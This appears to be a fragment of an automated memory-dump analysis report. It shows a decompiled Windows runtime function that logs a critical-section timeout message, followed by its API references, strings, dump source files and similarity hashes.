	intOrPtr _t10;
	intOrPtr* _t12;
	intOrPtr* _t13;
	intOrPtr _t14;
	intOrPtr* _t15;

	_t13 = __edx;                                                                                                                     // 0x04fafdda
	_push(_a4);                                                                                                                       // 0x04fafde2
	_t14 =  *[fs:0x18];                                                                                                               // 0x04fafde5
	_t15 = _t12;                                                                                                                      // 0x04fafdec
	_t7 = E04F5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);                                                     // 0x04fafdfa
	_push(_t13);                                                                                                                      // 0x04fafdff
	E04FA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);                                                  // 0x04fafe0a
	_t9 =  *_t15;                                                                                                                     // 0x04fafe0f
	if(_t9 == 0xffffffff) {                                                                                                           // 0x04fafe17
		_t10 = 0;                                                                                                                     // 0x04fafe1e
	} else {                                                                                                                          // 0x04fafe19
		_t10 =  *((intOrPtr*)(_t9 + 0x14));                                                                                           // 0x04fafe19
	}                                                                                                                                 // 0x04fafe19
	_push(_t10);                                                                                                                      // 0x04fafe20
	_push(_t15);                                                                                                                      // 0x04fafe21
	_push( *((intOrPtr*)(_t15 + 0xc)));                                                                                               // 0x04fafe22
	_push( *((intOrPtr*)(_t14 + 0x24)));                                                                                              // 0x04fafe25
	return E04FA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20))); // 0x04fafe40
}

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04FAFDFA
Strings
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04FAFE2B
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04FAFE01
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
• API String ID: 885266447-3903918235
• Opcode ID: 4439762dcffcb46e9cb251b999aac2be5317c375b3b24069abba0b63bb49e5a0
• Instruction ID: 0a7c3062b557dfad5cf6a383260f20d763bd8a4b3751f680e1f11824201a2135
• Opcode Fuzzy Hash: 4439762dcffcb46e9cb251b999aac2be5317c375b3b24069abba0b63bb49e5a0
• Instruction Fuzzy Hash: 69F0F6B2600201BFEA201A45DC46F33BF5AEB84730F254315F6285A1E1EA62FC3196F4
Uniqueness
Uniqueness Score: -1.00%